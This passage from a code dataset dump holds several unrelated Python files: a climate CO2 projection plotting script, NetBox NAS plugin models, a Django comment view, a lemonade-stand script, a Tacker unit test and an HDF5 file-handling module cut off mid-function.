np.log(2) / 37\r\n self.Uncertainty = 10.0\r\n return\r\n def Solve( self, t0, q, forceActual=False):\r\n l = len(t0)\r\n self.Solution_Time = t0\r\n self.Exp = np.exp(-self.Sigma * (t0-t0[0]))\r\n self.Solution_Total = np.ones( l) * self.Q_Initial\r\n for i in range(l):\r\n tmp = q[i] / self.M_atmosphere * self.conversion * self.Exp\r\n self.Solution_Total[i:] += tmp[:l-i]\r\n if not forceActual: return np.array( self.Solution_Total)\r\n k = len(self.Interpolation.CO2)\r\n self.Solution_Total[:k] = self.Interpolation.CO2\r\n return np.array( self.Solution_Total)\r\n\r\n#\r\n# Central England Temperatures\r\n#\r\nY_CET, T_CET = Load_Calibration(\r\n \"./Data/Central_England_Temperature_Dataset.txt\",\r\n [\"Year\", \"YEAR_Average\"], separator='\\t')\r\nbaseline = 
np.average(T_CET[:1750-1659])\r\ndT_CET = T_CET - baseline\r\ndT_CET_30 = FilterN( dT_CET, N=31) \r\n\r\n#\r\n# Calibrations\r\n#\r\n# Resources extraction (recalculated into mlrd toe)\r\nresources = Resources()\r\nYear = np.linspace(resources.Year[0], 2200, int( 2201-resources.Year[0]))\r\nRes1 = resources.Total / 1.13 * 3.66 # Convert to CO2\r\nRes2 = np.zeros(len(Year))\r\nfor i, r in enumerate(Res1): Res2[i] = r\r\nYear_Decimated = np.linspace(1830, 2200, 75)\r\nRes_Decimated = Decimate( Res1, 5)\r\n\r\n# CO2 emissions and actual concentration\r\nCO2seq = CO2_Sequestration_Analytical( model_start=Year[0])\r\nYearRCP, RCP_8_5, RCP_6_0, RCP_4_5, RCP_2_6 = Load_Calibration(\r\n \"./Data/IPCC_Emission_Scenarios_RCP.txt\",\r\n [\"Year\", \"RCP_8_5\", \"RCP_6\", \"RCP_4_5\", \"RCP_2_6\"],\r\n separator=\"\\t\")\r\nRCP_8_5 = ArrayMerge( Res_Decimated, RCP_8_5[4:]*3660)\r\nRCP_6_0 = ArrayMerge( Res_Decimated, RCP_6_0[4:]*3660)\r\nRCP_4_5 = ArrayMerge( Res_Decimated, RCP_4_5[4:]*3660)\r\nRCP_2_6 = ArrayMerge( Res_Decimated, RCP_2_6[4:]*3660)\r\nRCP_8_5 = np.interp(Year, Year_Decimated, RCP_8_5)\r\nRCP_6_0 = np.interp(Year, Year_Decimated, RCP_6_0)\r\nRCP_4_5 = np.interp(Year, Year_Decimated, RCP_4_5)\r\nRCP_2_6 = np.interp(Year, Year_Decimated, RCP_2_6)\r\nMatr = np.ones(11)\r\nRCP_8_5 = Filter(RCP_8_5, matrix=Matr)\r\nRCP_6_0 = Filter(RCP_6_0, matrix=Matr)\r\nRCP_4_5 = Filter(RCP_4_5, matrix=Matr)\r\nRCP_2_6 = Filter(RCP_2_6, matrix=Matr)\r\n\r\n# Production models\r\nMY2018 = Interpolation_Realistic_2018()\r\nMY2018.Solve(Year)\r\nMY2018.Correct_To_Actual( 1830, 2017)\r\nERoEI_2P = Bathtub( 1965, s0=0.2, x1 = 2085, s1=0.15, middle=12852).GetVector(Year)\r\nERoEI_2P += Hubbert( 2018, 0.5, 0.1, -1600).GetVector(Year)\r\nERoEI_2P += Hubbert( 2050, 0.3, 0.14, 3070).GetVector(Year)\r\nERoEI_2P /= 1.13\r\nERoEI_2P *= 3.66\r\nSharkFin = Linear_Combo() \r\nSharkFin.Wavelets += [Hubbert( x0=2059.000, s0=0.03471, s1=0.10632, peak=16.100, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=1973.000, s0=0.20589, s1=0.54487, peak=2.143, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=1979.000, s0=0.65610, s1=0.31381, peak=2.252, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=1989.730, s0=0.43047, s1=0.28243, peak=1.885, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=2012.973, s0=0.15009, s1=0.12036, peak=2.157, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=2091.892, s0=0.28243, s1=0.20589, peak=0.357, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=2068.108, s0=0.34868, s1=0.31067, peak=-0.660, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=2048.108, s0=0.28243, s1=0.34868, peak=-0.353, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=1917.297, s0=0.09135, s1=0.05686, peak=0.385, shift=0.000)]\r\nRes_Shark_Fin = SharkFin.GetVector(Year) / 1.13\r\nRes_Shark_Fin *= 3660\r\n\r\n# Apply actual\r\nfor i, r in enumerate(Res1):\r\n RCP_8_5[i] = r\r\n RCP_6_0[i] = r\r\n RCP_4_5[i] = r\r\n ERoEI_2P[i] = r\r\n Res_Shark_Fin[i] = r\r\n\r\nCO2_RCP_8_5 = CO2seq.Solve( Year, RCP_8_5, True)\r\nCO2_RCP_6_0 = CO2seq.Solve( Year, RCP_6_0, True)\r\nCO2_RCP_4_5 = CO2seq.Solve( Year, RCP_4_5, True)\r\nCO2_RCP_2_6 = CO2seq.Solve( Year, RCP_2_6, True)\r\nCO2_ERoEI_2P = CO2seq.Solve( Year, ERoEI_2P, True)\r\nCO2_Shark_Fin = CO2seq.Solve( Year, Res_Shark_Fin, True)\r\n\r\nln2 = np.log(2)\r\nshift = 0.2\r\nTCR_ECS = Sigmoid( 2000, 0.05, 1.33, 1.66).GetVector(Year)\r\nTCR_ECS_err = Sigmoid( 2000, 0.05, 1.90, 2.70).GetVector(Year) - TCR_ECS \r\n#TCR_ECS = Sigmoid( 2100, 0.05, 2.5, 
2.5).GetVector(Year)\r\n#TCR_ECS_err = Sigmoid( 2100, 0.05, 4.5, 4.5).GetVector(Year) - TCR_ECS \r\n#TCR_ECS = Sigmoid( 2100, 0.05, 1.66, 1.66).GetVector(Year)\r\n#TCR_ECS_err = Sigmoid( 2100, 0.05, 2.70, 2.70).GetVector(Year) - TCR_ECS \r\nlog_RCP_8_5 = np.log( CO2_RCP_8_5 / CO2seq.Q_Initial) / ln2\r\nT_RCP_8_5 = log_RCP_8_5 * TCR_ECS + shift\r\nT_RCP_8_5_err = log_RCP_8_5 * TCR_ECS_err\r\nlog_RCP_6_0 = np.log( CO2_RCP_6_0 / CO2seq.Q_Initial) / ln2\r\nT_RCP_6_0 = log_RCP_6_0 * TCR_ECS + shift\r\nT_RCP_6_0_err = log_RCP_6_0 * TCR_ECS_err\r\nlog_RCP_4_5 = np.log( CO2_RCP_4_5 / CO2seq.Q_Initial) / ln2\r\nT_RCP_4_5 = log_RCP_4_5 * TCR_ECS + shift\r\nT_RCP_4_5_err = log_RCP_4_5 * TCR_ECS_err\r\nlog_RCP_2_6 = np.log( CO2_RCP_2_6 / CO2seq.Q_Initial) / ln2\r\nT_RCP_2_6 = log_RCP_2_6 * TCR_ECS + shift\r\nT_RCP_2_6_err = log_RCP_2_6 * TCR_ECS_err\r\nT_ERoEI_2P = np.log( CO2_ERoEI_2P / CO2seq.Q_Initial) / ln2 * TCR_ECS + shift\r\nT_MY2018 = np.log( MY2018.CO2 / CO2seq.Q_Initial) / ln2 * TCR_ECS + shift\r\nT_ERoEI_2P = np.log( CO2_ERoEI_2P / CO2seq.Q_Initial) / ln2 * TCR_ECS + shift\r\nT_Shark_Fin = np.log( CO2_Shark_Fin / CO2seq.Q_Initial) / ln2 * TCR_ECS + shift\r\n\r\nlimits = 1650, 2200\r\n\r\nfig = plt.figure( figsize=(15,15))\r\ngs = plt.GridSpec(2, 1, height_ratios=[1,1])\r\nax1 = plt.subplot( gs[0])\r\nax2 = plt.subplot( gs[1])\r\n\r\nax1.set_title( \"Концентрация CO₂ в атмосфере\", fontsize=22)\r\nunc = np.ones(len(CO2seq.Interpolation.Time)) * 0.5\r\nfor i in range(126,-1,-1): unc[i] = 10 \r\nax1.errorbar( CO2seq.Interpolation.Time, CO2seq.Interpolation.CO2,\r\n yerr=unc, fmt=\".\", color=\"k\", alpha=0.2, label=\"Реальная (1830-2018)\")\r\nax1.plot( Year, CO2_RCP_8_5, \"-.\", lw=3, color=\"g\", alpha=0.2)\r\nax1.text( 2201, CO2_RCP_8_5[-1], \"8.5\", color=\"g\")\r\nax1.plot( Year, CO2_RCP_6_0, \"--\", lw=3, color=\"g\", alpha=0.5)\r\nax1.text( 2201, CO2_RCP_6_0[-1], \"6.0\", color=\"g\")\r\nax1.plot( Year, CO2_RCP_4_5, \"-\", lw=4, color=\"g\", alpha=0.5, label=\"IPCC RCP 2013\")\r\nax1.text( 2201, CO2_RCP_4_5[-1], \"4.5\", color=\"g\")\r\nax1.plot( Year, CO2_RCP_2_6, \"-.\", lw=3, color=\"g\", alpha=0.5)\r\nax1.text( 2201, CO2_RCP_2_6[-1], \"2.6\", color=\"g\")\r\nax1.plot( Year, MY2018.CO2, \".\", lw=2, color=\"r\", alpha=0.5, label=\"Хаббертиана, URR=1200 млрд toe\")\r\nax1.plot( Year, CO2_ERoEI_2P, \"--\", lw=4, color=\"m\", alpha=0.5, label=\"Метод ERoEI, URR=1400 млрд toe\")\r\nax1.plot( Year, CO2_Shark_Fin, \"-\", lw=4, color=\"m\", alpha=0.5, label=\"Акулий плавник, URR=1400 млрд toe\")\r\nax1.set_xlim( limits)\r\nax1.set_ylabel(\"ppmv\")\r\nax1.set_ylim( 0, 1000)\r\nax1.grid( True)\r\nax1.legend( loc=0)\r\n\r\nax2.set_title( \"Эффект Аррениуса\", fontsize=22)\r\nax2.plot( Year, T_RCP_8_5, \"-.\", lw=2, color=\"g\", alpha=0.5)\r\n#ax2.bar( Year, T_RCP_8_5_err, bottom=T_RCP_8_5, width=1, color=\"r\", alpha=0.05)\r\nax2.text( 2201, T_RCP_8_5[-1], \"8.5\", color=\"g\")\r\nax2.plot( Year, T_RCP_6_0, \"--\", lw=3, color=\"g\", alpha=0.5)\r\nax2.bar( Year, T_RCP_6_0_err, bottom=T_RCP_6_0, width=1, color=\"y\", alpha=0.2)\r\nax2.text( 2201, T_RCP_6_0[-1], \"6.0\", color=\"g\")\r\nax2.plot( Year, T_RCP_4_5, \"-\", lw=3, color=\"g\", alpha=0.5, label=\"IPCC RCP 2013\")\r\nax2.bar( Year, T_RCP_4_5_err, bottom=T_RCP_4_5-T_RCP_4_5_err, width=1, color=\"y\", alpha=0.2)\r\nax2.bar( Year, T_RCP_6_0-T_RCP_4_5, bottom=T_RCP_4_5, width=1, color=\"y\", alpha=0.2)\r\nax2.text( 2201, T_RCP_4_5[-1], \"4.5\", color=\"g\")\r\nax2.plot( Year, T_RCP_2_6, \"-.\", lw=2, color=\"g\", alpha=0.5)\r\nax2.text( 
2201, T_RCP_2_6[-1], \"2.6\", color=\"g\")\r\nax2.plot( Year, T_MY2018, \".\", lw=2, color=\"r\", alpha=0.5, label=\"Хаббертиана, URR=1200 млрд toe\")\r\nax2.plot( Year, T_ERoEI_2P, \"--\", lw=4, color=\"m\", alpha=0.5, label=\"Метод ERoEI, URR=1400 млрд toe\")\r\nax2.plot( Year, T_Shark_Fin, \"-\", lw=4, color=\"m\", alpha=0.5, label=\"Акулий плавник, URR=1400 млрд toe\")\r\nax2.errorbar( Y_CET, dT_CET_30,yerr=0.46, fmt=\"o\", color=\"k\", alpha=0.2, label=\"Среднегодовые Центральной Англии (30-летний фильтр)\")\r\nax2.set_xlim( limits)\r\nax2.set_ylabel(\"°Ц от среднего до 1750 года\")\r\nax2.set_ylim( -1, 3.5)\r\nax2.grid( True)\r\nax2.legend( loc=0)\r\nax2.set_xlabel(\"год\")\r\n\r\nplt.savefig( \"./Graphs/figure_18_05.png\")\r\nif InteractiveModeOn: plt.show(True)\r\n","repo_name":"myak555/LIMITS_TO_LIMITS","sub_path":"Chapter 18/Test_05_CO2_Accumulation.py","file_name":"Test_05_CO2_Accumulation.py","file_ext":"py","file_size_in_byte":9315,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"31278849815","text":"from django.contrib.contenttypes.fields import GenericRelation\nfrom django.contrib.postgres.fields import ArrayField\nfrom django.db import models\nfrom django.urls import reverse\nfrom netbox.models import NetBoxModel\nfrom tenancy.models import Tenant, ContactAssignment\nfrom ipam.models import Prefix, IPAddress\nfrom dcim.models import Device\nfrom utilities.choices import ChoiceSet\nfrom utilities.forms.fields import CommentField, DynamicModelChoiceField, DynamicModelMultipleChoiceField\n\nclass NASVolumeSecurityStyleChoices(ChoiceSet):\n CHOICES = [\n ('unix', 'UNIX'),\n ('windows', 'Windows'),\n ]\n\nclass NASShareTypeChoices(ChoiceSet):\n CHOICES = [\n ('nfs', 'NFS', 'orange'),\n ('smb', 'SMB/CIFS', 'green'),\n ('gpfs', 'GPFS', 'blue'),\n ('cephfs', 'CephFS', 'purple'),\n ]\n\nclass NASShareAccessLevelChoices(ChoiceSet):\n CHOICES = [\n ('rw', 'Read/Write'),\n ('ro', 'Read-Only'),\n ]\n\nclass NASCluster(NetBoxModel):\n name = models.CharField(\n max_length=100,\n unique=True\n )\n\n devices = models.ManyToManyField(\n to='dcim.Device',\n related_name='devices',\n blank=True,\n verbose_name='Devices'\n )\n\n access_ips = models.ManyToManyField(\n to='ipam.IPAddress',\n related_name='nas_cluster_access_ips',\n blank=True,\n verbose_name='Access IPs'\n )\n\n description = models.CharField(\n max_length=500,\n blank=True\n )\n\n comments = models.TextField(\n blank=True\n )\n\n contacts = GenericRelation(\n to=ContactAssignment\n )\n\n tenant = models.ForeignKey(\n to=Tenant,\n on_delete=models.PROTECT,\n related_name='nas_clusters',\n blank = True,\n null = True\n )\n\n class Meta:\n ordering = ('name',)\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('plugins:netbox_nas:nascluster', args=[self.pk])\n\nclass NASVolume(NetBoxModel):\n nas_cluster = models.ForeignKey(\n to=NASCluster,\n on_delete=models.PROTECT,\n related_name='volumes'\n )\n\n name = models.CharField(\n max_length=100\n )\n\n export_id = models.PositiveIntegerField()\n\n owner = models.CharField(\n max_length=100\n )\n\n group = models.CharField(\n max_length=100\n )\n\n size_gb = models.PositiveIntegerField()\n\n local_directory = models.CharField(\n max_length=200\n )\n\n security_style = models.CharField(\n max_length=30,\n choices=NASVolumeSecurityStyleChoices,\n default='unix'\n )\n\n base_unix_permissions = models.CharField(\n max_length=100,\n default='2770'\n )\n\n description = models.CharField(\n 
max_length=500,\n blank=True\n )\n\n comments = models.TextField(\n blank=True\n )\n\n contacts = GenericRelation(\n to=ContactAssignment\n )\n\n tenant = models.ForeignKey(\n to=Tenant,\n on_delete=models.PROTECT,\n related_name='nas_volumes',\n blank = True,\n null = True\n )\n\n class Meta:\n ordering = ('nas_cluster', 'local_directory')\n unique_together = (\n ('nas_cluster', 'local_directory'),\n ('nas_cluster', 'export_id'),\n )\n\n def __str__(self):\n return f'{self.nas_cluster}: {self.local_directory}'\n\n def get_absolute_url(self):\n return reverse('plugins:netbox_nas:nasvolume', args=[self.pk])\n\nclass NASShare(NetBoxModel):\n nas_volume = models.ForeignKey(\n to=NASVolume,\n on_delete=models.PROTECT,\n related_name='shares'\n )\n\n name = models.CharField(\n max_length=50\n )\n\n volume_subdirectory = models.CharField(\n max_length=200,\n default='/'\n )\n\n type = models.CharField(\n max_length=30,\n choices=NASShareTypeChoices\n )\n\n mount_options = models.CharField(\n max_length=100,\n blank=True\n )\n\n access_level = models.CharField(\n max_length=30,\n choices=NASShareAccessLevelChoices,\n default='rw'\n )\n\n access_prefixes = models.ManyToManyField(\n to='ipam.Prefix',\n related_name='nas_share_access_prefixes',\n blank=True,\n verbose_name='Access Prefixes'\n )\n\n access_ips = models.ManyToManyField(\n to='ipam.IPAddress',\n related_name='nas_share_access_ips',\n blank=True,\n verbose_name='Access IPs'\n )\n\n description = models.CharField(\n max_length=500,\n blank=True\n )\n\n comments = models.TextField(\n blank=True\n )\n\n contacts = GenericRelation(\n to=ContactAssignment\n )\n\n tenant = models.ForeignKey(\n to=Tenant,\n on_delete=models.PROTECT,\n related_name='nas_shares',\n blank = True,\n null = True\n )\n\n class Meta:\n ordering = ('nas_volume', 'name')\n unique_together = ('nas_volume', 'name')\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('plugins:netbox_nas:nasshare', args=[self.pk])\n\nclass NASMount(NetBoxModel):\n nas_share = models.ForeignKey(\n to=NASShare,\n on_delete=models.PROTECT,\n related_name='mounts'\n )\n\n devices = models.ManyToManyField(\n to='dcim.Device',\n related_name='nas_mount_devices',\n blank=True,\n verbose_name='Devices'\n )\n\n virtual_machines = models.ManyToManyField(\n to='virtualization.VirtualMachine',\n related_name='nas_mount_virtual_machines',\n blank=True,\n verbose_name='Virtual Machines'\n )\n\n local_directory = models.CharField(\n max_length=200\n )\n\n mount_options = models.CharField(\n max_length=100,\n blank=True\n )\n\n description = models.CharField(\n max_length=500,\n blank=True\n )\n\n comments = models.TextField(\n blank=True\n )\n\n contacts = GenericRelation(\n to=ContactAssignment\n )\n\n tenant = models.ForeignKey(\n to=Tenant,\n on_delete=models.PROTECT,\n related_name='nas_mounts',\n blank = True,\n null = True\n )\n\n class Meta:\n ordering = ('nas_share', 'local_directory')\n unique_together = ('nas_share', 'local_directory')\n\n def __str__(self):\n return f'{self.nas_share}: {self.local_directory}'\n\n def get_absolute_url(self):\n return reverse('plugins:netbox_nas:nasmount', args=[self.pk])\n","repo_name":"wutcat/netbox-nas","sub_path":"netbox_nas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"24548321945","text":"from django.shortcuts import render,get_object_or_404,redirect,reverse\nfrom django.http 
import HttpResponse,HttpResponseRedirect\nfrom .forms import CommentForm\nfrom blogtest.models import Post\n\n# Create your views here.\n\n\n\ndef comitcoment(request,id):\n \"\"\"评论功能\"\"\"\n post = get_object_or_404(Post,pk=id)\n if request.method == \"POST\":\n comment = CommentForm(request.POST)\n if comment.is_valid():\n comment = comment.save(commit=False)\n comment.post = post\n comment.save()\n return redirect(reverse('blogtest:detail',args=(id,)))\n else:\n return HttpResponse('评论失败')","repo_name":"Wlh12345678/Django","sub_path":"blog/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5613395897","text":"def get_order():\n item = input()\n if not item:\n return '00'\n if item == 'Q':\n return 'QQ'\n quantity = int(input('How many? '))\n return item, quantity\n \nregister = 0\norder = ''\nprices = 50, 75, 100\n\nprint('Lemonade Stand starting up...')\nprint('Ready to take orders!')\n\nwhile 1:\n print('What would you like to order (1-3)? One at a time, please.')\n print('1. Glass of lemonade - $0.50\\n'\n '2. Glass of grapefruit juice - $0.75\\n'\n '3. Cookie - $1.00')\n item, quantity = get_order()\n if item == 'Q':\n break\n if item == '0':\n quantities = list(order.count(obj) for obj in '123')\n for name,number,price in zip(('Glasses of lemonade', 'Glasses of grapefruit juice', 'Cookies'),\n quantities,\n prices):\n if number:\n print('{}: {}. ${:.02f}'.format(name, number, number*price/100))\n total = sum(name*number for name,number in zip(quantities, prices))\n register += total\n print('Total: ${:.02f}'.format(total/100))\n tendered = int(input('Input cash (n.nn): ').replace('.', '').lstrip('0'))\n change = tendered - total\n denominations = ('Fifties', 'Twenties', 'Tens', 'Fives', 'Ones',\n 'Quarters', 'Dimes', 'Nickels', 'Pennies')\n user_denominations = {}\n dollars, cents = divmod(change, 100)\n user_denominations['Fifties'], dollars = divmod(dollars, 50)\n user_denominations['Twenties'], dollars = divmod(dollars, 20)\n user_denominations['Tens'], dollars = divmod(dollars, 10)\n user_denominations['Fives'], user_denominations['Ones'] = divmod(dollars, 5)\n user_denominations['Quarters'], cents = divmod(cents, 25)\n user_denominations['Dimes'], cents = divmod(cents, 10)\n user_denominations['Nickels'], user_denominations['Pennies'] = divmod(cents, 5)\n if any(user_denominations.values()):\n print('Your change:')\n for denomination in denominations:\n quant = user_denominations[denomination]\n if quant:\n print('{}: {}'.format(denomination, quant))\n order = ''\n else:\n order += item*quantity\n\nprint(\"Today's total: ${:.02f}\".format(register/100))","repo_name":"TigerhawkT3/small_scripts","sub_path":"lemonade_stand.py","file_name":"lemonade_stand.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"3"} +{"seq_id":"72360463763","text":"from tacker import context\nfrom tacker.sol_refactored.common import exceptions as sol_ex\nfrom tacker.sol_refactored.common import monitoring_plugin_base as mon_base\nfrom tacker.sol_refactored.common import server_notification\nfrom tacker.sol_refactored.common import vnf_instance_utils as inst_utils\nfrom tacker.sol_refactored import objects\nfrom tacker.tests.unit import base\n\nfrom unittest import mock\n\n_inst1 = {\n 'id': 'test_id',\n 'vnfdId': 'vnfdId',\n 'vnfProvider': 'vnfProvider',\n 'vnfProductName': 
'vnfProductName',\n 'vnfSoftwareVersion': 'vnfSoftwareVersion',\n 'vnfdVersion': 'vnfdVersion',\n 'instantiationState': 'NOT_INSTANTIATED',\n 'instantiatedVnfInfo': {\n 'id': 'id',\n 'vduId': 'vduId',\n 'vnfcResourceInfo': [\n {\n 'id': 'vnfc_resource_id1',\n 'vduId': 'vduId',\n 'computeResource': {},\n 'metadata': {\n \"server_notification\": {\n \"alarmId\": \"alarm_id\"\n }\n }\n }, {\n 'id': 'vnfc_resource_id2',\n 'vduId': 'vduId2',\n 'computeResource': {},\n 'metadata': {\n \"server_notification\": {\n \"alarmId\": \"alarm_id2\"\n }\n }\n }\n ],\n 'vnfcInfo': [{\n 'id': 'vnfc_info1',\n 'vduId': 'vdu_id',\n 'vnfcResourceInfoId': 'vnfc_resource_id1',\n 'vnfcState': 'STARTED'\n }],\n 'metadata': {\n 'ServerNotifierUri': 'ServerNotifierUri',\n 'ServerNotifierFaultID': ['1111', '1234']\n }\n }\n}\n\n_body = {\n 'notification': {\n 'alarm_id': 'alarm_id',\n 'fault_id': '1234',\n 'fault_type': '10',\n }\n}\n\n\nclass TestServerNotification(base.TestCase):\n def setUp(self):\n super(TestServerNotification, self).setUp()\n objects.register_all()\n self.context = context.get_admin_context()\n self.request = mock.Mock()\n self.request.context = self.context\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n\n def tearDown(self):\n super(TestServerNotification, self).tearDown()\n server_notification.ServerNotification._instance = None\n\n @mock.patch.object(inst_utils, 'get_inst')\n def test_notify(self,\n mock_inst):\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n\n mock_inst.return_value = objects.VnfInstanceV2.from_dict(_inst1)\n sn.notify(self.request, 'test_id', body=_body)\n\n @mock.patch.object(inst_utils, 'get_inst')\n def test_notify_no_callback(self,\n mock_inst):\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n sn.set_callback(None)\n\n mock_inst.return_value = objects.VnfInstanceV2.from_dict(_inst1)\n sn.notify(self.request, 'test_id', body=_body)\n\n def test_notify_error_schema(self):\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n self.assertRaises(\n sol_ex.ServerNotificationValidationError,\n sn.notify, self.request, 'test_id')\n\n def test_constructor_error(self):\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n self.assertRaises(\n SystemError,\n server_notification.ServerNotification)\n\n def test_constructor_stub(self):\n self.config_fixture.config(\n group='server_notification', server_notification=False)\n server_notification.ServerNotification._instance = None\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n self.assertIsInstance(sn._instance, mon_base.MonitoringPluginStub)\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n self.assertIsInstance(sn._instance, 
mon_base.MonitoringPluginStub)\n\n def test_monitoring_plugin(self):\n mon_base.MonitoringPluginStub._instance = None\n mon = mon_base.MonitoringPlugin.get_instance(\n mon_base.MonitoringPluginStub)\n mon.set_callback(None)\n mon.create_job()\n mon.delete_job()\n mon.alert()\n\n def test_monitoring_plugin_stub(self):\n mon_base.MonitoringPluginStub._instance = None\n mon_base.MonitoringPlugin.get_instance(\n mon_base.MonitoringPluginStub)\n mon = mon_base.MonitoringPlugin.get_instance(\n mon_base.MonitoringPluginStub)\n mon.set_callback(None)\n mon.create_job()\n mon.delete_job()\n mon.alert()\n self.assertRaises(\n SystemError,\n mon_base.MonitoringPluginStub)\n","repo_name":"openstack/tacker","sub_path":"tacker/tests/unit/sol_refactored/common/test_server_notification.py","file_name":"test_server_notification.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"3"} +{"seq_id":"27069928033","text":"# -*- coding: utf-8 -*-\n#\n#\tCFEL file handling tools\n#\tAnton Barty\n#\n\nimport os\nimport sys\nimport csv\nimport h5py\nimport glob\nimport numpy as np\n\n\n# Needed for dialog_pickfile()\nimport PyQt4\nimport PyQt4.QtGui\nqtApp = PyQt4.QtGui.QApplication(sys.argv)\n\n\ndef dialog_pickfile(write=False, directory=False, multiple=False, path=False, filter='*.*'):\n \"\"\"\n :param write:\n :param directory:\n :param multiple:\n :param path:\n :param filter:\n :return:\n See: http://doc.qt.io/qt-4.8/qfiledialog.html\n \"\"\"\n QtWin= PyQt4.QtGui.QMainWindow()\n\n if path==False:\n path= ''\n\n if write==True:\n caption = 'Select destination file'\n file = PyQt4.QtGui.QFileDialog.getSaveFileName(QtWin, caption, path, filter)\n return file\n\n elif directory==True:\n caption = 'Select directory'\n dirname= PyQt4.QtGui.QFileDialog.getExistingDirectory(QtWin, caption, path)\n return dirname\n\n elif multiple==True:\n caption = 'Select Files'\n files = PyQt4.QtGui.QFileDialog.getOpenFileNames(QtWin, caption, path, filter)\n return files\n\n else:\n caption = 'Select File'\n file = PyQt4.QtGui.QFileDialog.getOpenFileName(QtWin, caption, path, filter)\n return file\n#end dialog_pickfile()\n\n\n\ndef file_search(pattern, recursive=True, iterator=False):\n \"\"\"\n :param pattern:\n :param recursive: True/False (default=True, '**' matches directories)\n :param iterator:\n :return:\n \"\"\"\n if iterator:\n files = glob.iglob(pattern, recursive=recursive)\n else:\n files = glob.glob(pattern, recursive=recursive)\n return files\n#end file_search()\n\n\ndef read_h5(filename='', field=\"/data/data\"):\n \"\"\"\n Read a simple HDF5 file\n\n if n_elements(filename) eq 0 then $\n filename = dialog_pickfile()\n \"\"\"\n\n # Open a file selection dialog if no filename is provided\n if filename == '':\n filename = dialog_pickfile()\n if filename == '':\n return\n\n\n # Open HDF5 file\n fp = h5py.File(filename, 'r')\n\n # Read the specified field\n data = fp[field][:]\n\n # Close and clean up\n fp.close()\n\n # return\n return data\n# end read_h5\n\n\n\n\ndef write_h5(filename, field=\"data/data\", compress=3):\n \"\"\" \n Write a simple HDF5 file\n\n IDL code\n \tif n_elements(filename) eq 0 then begin\n\t\tprint,'write_simple_hdf5: No filename specified...'\n\t\treturn\n\tendif\n\t\n\tif n_elements(data) eq 0 then begin\n\t\tprint,'write_simple_hdf5: No data specified...'\n\t\treturn\n\tendif\n\tdim = size(data,/dimensions)\n\t\n\t\n\tif not keyword_set(compress) then begin\n\t\tcompress=3\n\tendif\n\t\n\n\t;; HDF5 
compression chunks\n\tchunksize = dim\n\tif n_elements(dim) ge 3 then $\n\t;;\tchunksize[0] = dim[0]/8;\n\t;;\tchunksize[0:n_elements(chunksize)-3] = 1\n\n\t\n\tfid = H5F_CREATE(filename) \n\tgroup_id = H5G_CREATE(fid, 'data')\n\tdatatype_id = H5T_IDL_CREATE(data) \n\tdataspace_id = H5S_CREATE_SIMPLE(dim) \n\n\tif (compress eq 0) then begin\n\t\tdataset_id = H5D_CREATE(fid,'data/data',datatype_id,dataspace_id) \n\tendif else begin\n\t\t;; GZIP keyword is ignored if CHUNK_DIMENSIONS is not specified.\n\t\tdataset_id = H5D_CREATE(fid,'data/data',datatype_id,dataspace_id, gzip=compression, chunk_dimensions=chunksize) \n\t\t;dataset_id = H5D_CREATE(fid,'data/data',datatype_id,dataspace_id, chunk_dimensions=chunksize, gzip=compression, /shuffle) \n\tendelse\n\n\tH5D_WRITE,dataset_id,data \n\tH5D_CLOSE,dataset_id \n\tH5S_CLOSE,dataspace_id \n\tH5T_CLOSE,datatype_id \n\tH5G_CLOSE,group_id\n\tH5F_CLOSE,fid \n \"\"\"\n# end write_h5\n\n\n#\n# Write selected dict keys to csv file\n#\n# Provide a list of keys to force consistent ordering\n# Order of keys in the dict can be different each time\n# Seriously - try it and see with print(dict.keys())\n#\ndef dict_to_csv(filename, dict, keys):\n\n ncol = len(keys)\n nrows = len(dict[keys[0]])\n\n # Check all keys are in the dict\n for k in keys:\n if not k in dict.keys():\n print(\"Error in dict_to_csv\")\n print(\"Requested key is not in dict\")\n print(\"Requested key: \", k)\n print(\"Available keys: \", dict.keys())\n return\n\n\n # Check all lines are the same length\n for k in keys:\n if len(dict[k]) != nrows:\n print(\"Error in dict_to_csv\")\n print(\"Dict element \", k, \"does not have the same dimensions\")\n print(\"nlines: \", k, ' = ', len(dict[k]))\n print(\"nlines: \", keys[0], ' = ', nrows)\n return\n #endif\n #endfor\n\n # Write columns with header row\n with open(filename, 'w') as f:\n #w = csv.writer(sys.stderr)\n w = csv.writer(f)\n w.writerow(keys)\n\n for row in range(0, nrows):\n str_out = []\n for 